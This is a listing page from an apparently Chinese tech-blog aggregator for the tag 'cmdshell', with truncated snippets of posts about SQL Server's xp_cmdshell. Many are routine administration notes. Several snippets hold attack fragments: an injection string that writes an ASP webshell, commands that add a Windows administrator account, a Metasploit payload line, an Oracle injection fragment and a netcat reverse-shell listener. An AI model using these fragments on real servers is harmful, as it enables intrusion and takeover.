cmdshell

BCP导入导出MsSql

--username数据登录名 --password数据库密码 EXECmaster..xp_cmdshell'BCP"SELECT*FROMTestdb.dbo.TestVoucher"queryoutd
dyllove98·2013-07-19 20:00

BCP导入导出MsSql

--username数据登录名 --password数据库密码 EXECmaster..xp_cmdshell'BCP"SELECT*FROMTestdb.dbo.TestVoucher"q
·2013-07-19 11:00

(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因

print"Metasploitpayloaddelivered.." print"Convertingourpayloadtobinary,thismaytakeafew..." query5=("""xp_cmdshell'h2bmetasploit
feier7501·2013-07-10 22:00

使用SQL语句获得服务器名称和IP 地址

获取服务器名称: SELECTSERVERPROPERTY('MachineName')select@@SERVERNAMEselectHOST_NAME()获取IP地址可以使用xp_cmdshell执行
lzf328·2013-07-09 14:03

使用SQL语句获得服务器名称和IP 地址

获取服务器名称:SELECTSERVERPROPERTY('MachineName')select@@SERVERNAMEselectHOST_NAME()获取IP地址可以使用xp_cmdshell执行
KevinLiu·2013-07-09 10:52

MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell

fasttrack操作:root@bt:~#cd/pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack#./fast-track.py-i *********************************************** *******Performingdependencychecks...******* *
feier7501·2013-07-08 20:00

MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell

上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。
feier7501·2013-07-07 16:00

sql2000安全设置,堵截cmd.exe和ftp.exe木马入侵

这个主要是sql2000的安全设置漏洞,是调用外壳“xp_cmdshell”引起的!xp_cmdshell存储过程很危险,建议删除,该过程不会对sqlserver有什么影响的!
lcpljc·2013-07-04 18:57

sql2000安全设置,堵截cmd.exe和ftp.exe******

这个主要是sql2000的安全设置漏洞,是调用外壳“xp_cmdshell”引起的!xp_cmdshell存储过程很危险,建议删除,该过程不会对sqlserver有什么影响的!
lcpljc·2013-07-04 18:57

sql常用命令

* 功能:通过xp_cmdshell执行命令 * 本例:添加一个系统帐号,并加入管理员组.或执行一个批处理bat文件:c:\test.bat */exec master.xp_cmdshell 'net
矢风快乐·2013-06-18 21:00

SQL Server 2005 建表语句

usemastergoIFEXISTS(SELECT*FROMsys.databasesWHEREname='StudyDB') DROPDATABASEStudyDB  --如果存在则删除GOEXECxp_cmdshell'mkdirD
Java编程思想·2013-06-17 08:00

bcp备份数据表报“无法打开宿主数据文件”的解决方案

语句:execmaster..xp_cmdshell'bcpdbName.tableNameout local-path-file-c-U"sa"-P"pwd"'其中之一的解决办法是:在本机上创建一个可读写的共享文件夹
vcPlayer·2013-06-16 00:00

使用SQL Server判断文件是否存在后再删除(详解)

在SQLServer中可以使用系统内部存储过程xp_fileexist判断文件是否存在,如果存在再使用xp_cmdshell删除文件。
·2013-06-11 14:28

SQL注入与ASP木马上传

1、SQL注入的时候,用xp_cmdshell向服务器上写入一个能写文件的asp文件。
oMingZi12345678·2013-06-07 11:00

Bcp 使用心得

首先在做bcp的时候,要开通大数据量访问权限一、基于sql语句的导入导出如果是基于SQL语句的导入导出,需要使用存储过程“master..xp_cmdshell”,默认情况下,sqlserver2005
秦岭过客·2013-06-05 17:00

异地备份和还原方案

一下内容是从百度文库中获得的,上两篇的备份时这里面的第四种方法,以下内容只提供参考 第一种实现方法如下:(sqlserver2000) 这是一个很常见的需求,网上也有相关的解决方法,主要是通过映射网络盘和执行cmdshell
ywjun0919·2013-05-29 13:00

异地备份和还原方案(备份)

测试服务器SQL2005环境Windows7使用方法1,写成存储过程,建立作业定时备份(方案)--在sql中映射一下execmaster..xp_cmdshell'netusez:\\computer_
ywjun0919·2013-05-29 13:00

sql 获取链接服务器磁盘占用信息

该sql会调用xp_cmdshell查询磁盘总大小,一般服务器会因安全问题禁用该SP!!!
zhang_215·2013-05-17 13:00

数据库的实现

--启动外围配置  exec sp_configure 'show advanced options',1  reconfigure   exec sp_configure 'xp_cmdshell
彳亍的路人·2013-05-05 15:28

sql_server sa开启xp_cmdshell

 执行数据库指令 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell
luwenji309·2013-04-24 11:04

在SQL 脚本中进行 文件的读写

首先需要开启xp_cmdshell sp_configure'showadvancedoptions',1 reconfigure go sp_configure'xp_cmdshell',1
·2013-04-23 19:00

在SQL 脚本中进行 文件的读写

首先需要开启xp_cmdshellsp_configure'showadvancedoptions',1 reconfigure go sp_configure'xp_cmdshell',1 reconfigure
hailanzhijia·2013-04-23 15:00

在有注入漏洞的SQL服务器上运行CMD命令

利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。
eldn__·2013-04-20 19:00

SQL2000的存储过程删除恢复

http://www.torylf.com/43.html1.xp_cmdshell被删除2.xp_cmdshell所使用的xplog70.dll被删除那么如果是第一中情况的话就很简单了,我们只需要恢复存储过程就可以了
eldn__·2013-04-20 18:00

SQL入侵恢复xp_cmdshell方法总结

1433SQL入侵恢复xp_cmdshell方法总结 sqlserver2005下开启xp_cmdshell的办法 EXECsp_configure'showadvancedoptions',1;RECONFIGURE
eldn__·2013-04-20 16:00

最详细的SQL注入相关的命令整理

keyno=1881;execmaster.dbo.xp_cmdshell'echo^executerequest^("l"^)^>c:\mu.asp';--?
eldn__·2013-04-20 16:00

最详细的SQL注入相关的命令整理

keyno=1881;execmaster.dbo.xp_cmdshell'echo^executerequest^("l"^)^>c:\mu.asp';--?
eldn__·2013-04-20 16:00

获取本机IP地址

Declare@posint setnocounton set@ip=NULL Createtable#temp(ipLinevarchar(200)) Insert#tempexecmaster..xp_cmdshell
OrchidCat·2013-04-18 10:00

1433修复代码

 建立用户cmd命令:netuser用户密码/addnetlocalgroupadministrators用户/add  ErrorMessage:未能找到存储过程'master..xp_cmdshell
OPQ20·2013-04-13 14:42

SQL2005备份数据库到远程服务器中

SQL2005备份数据库到远程服务器中--打开高级设置EXECsp_configure'showadvancedoptions',1RECONFIGURE--打开xp_cmdshell扩展存储过程EXECsp_configure'xp_cmdshell
gdufo·2013-04-12 10:00

sql注入攻击详解(二)sql注入过程详解

由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是:1.发现SQL注入位置;2.判断后台数据库类型;3.确定XP_CMDSHELL
aoxida·2013-04-07 16:00

开启从Lotus 邮件系统到Exchange 系统的转移篇章-POC过程-Exchange 2007 安装!

Chimmy功能可以在很大程度上增强网络性能,但是对于CPU的负载将加重机器负担,一般我们都建议用户在AD及EXCHANGE上关闭这些功能,操作方式如下:a.首先我们关闭TCPChimmy功能和RSS功能,开启CMDSHELL
fogyisland2000·2013-03-22 22:00

SQL Server 2005 2208 xp_cmdshell存储过程 默认禁用了,用下面的语句可以打开和禁用。

SQLServer20052208xp_cmdshell存储过程默认禁用了,用下面的语句可以打开和禁用。
Dark Angle·2013-03-07 16:00

SQL Server 2005如何起用 xp_cmdshell - SQL-Server - IT技术网

xp_cmdshell扩展存储过程将命令字符串作为操作系统命令shell执行,并以文本行的形式返回所有输出。
5910231568·2013-02-25 10:43

mssql bulk 远程文件到数据库

 exec   master..xp_cmdshell   'net   use   z:   \\xz\c$   "密码"   /user:xz\administrator'           /*
zy100·2013-02-22 17:00

向往Cmd模式下的入侵吗

CmdShell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
long892230·2013-02-09 16:00

向往Cmd模式下的入侵吗

CmdShell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
long892230·2013-02-09 08:00

PS(Powershell) 是个神马东西?

谈POWERSHELL我们必须先谈谈Powershell的前身,CMDSHELL。 
fogyisland2000·2013-01-29 21:00

CMD Shell 入侵小全(一)

 CmdShell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
chin_disk·2013-01-11 13:50

通过SQL Server 创建windows 帐号

SQLServer创建windows帐号 EXECsp_configure'showadvancedoptions',1 GO RECONFIGURE GO EXECsp_configure'xp_cmdshell
zhaowenzhong·2012-12-26 17:00

微软SQL Server数据库SQL语句导入导出大全

/*******  导出到excel EXECmaster..xp_cmdshell’bcpSettleDB.dbo.shanghuoutc:\temp1.xls-c-q-S"GNETDATA/GNETDATA
guoshuang_123·2012-12-19 20:27

实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sqlplus执行的,在web注入时把selectSYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1and'1''a'||(selectSYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIA
hanghangaidoudou·2012-12-14 20:00

实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sqlplus执行的,在web注入时把selectSYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1and'1''a'||(selectSYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIA
杨航JAVA·2012-12-14 20:00

使用xp_cmdshell注销Windows登录用户(终端服务器超出最大连接数)

帐号没有及时注销,致使后面无法登录到服务器,显示错误如出现这样的问题还真麻烦,跑机房光手续都要两三天才能搞好.还好公司一直保留有Sa帐号,这就好办了,用SQL注销一个Windows登录用户即可.首先打开xp_cmdshell
·2012-12-10 21:44

SqlServer 之 sp_config 存储过程

xp_cmdshell扩展存储过程将命令字符串作为操作系统命令shell执行,并以文本行的形式返回所有输出。
换个什么名字·2012-12-08 11:37

零管道返回cmdshell

零管道返回cmdshell192.168.139.128为虚拟机的IP地址。实验步骤:1在虚拟机中开启nc-l-v-p8888进行监听2.运行编译好的程序虚拟机就会得到实体机的cmd了....
xiaocaiju·2012-12-06 14:00

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问

“消息15281,级别16,状态1,过程xp_cmdshell,第1行SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭
eldn__·2012-12-02 13:45

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问

“消息15281,级别16,状态1,过程xp_cmdshell,第1行SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭
eldn__·2012-12-02 13:00

MSSQL注入SA权限不显错模式下的入侵

这里的主机环境:MSSQL+JSP权限为不显错的SA,支持多行执行xp_cmdshell存活服务器处于内网,WEB和数据库在同一台服务器上。注意这里
eldn__·2012-12-01 20:00

启用和禁用xp_cmdshell

允许配置高级选项EXECsp_configure'showadvancedoptions',1GO--重新配置RECONFIGUREGO--禁用xp_cmdshellEXECsp_configure'xp_cmdshell
长平狐·2012-11-28 15:00
上一页 9 10 11 12 13 14 15 16 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他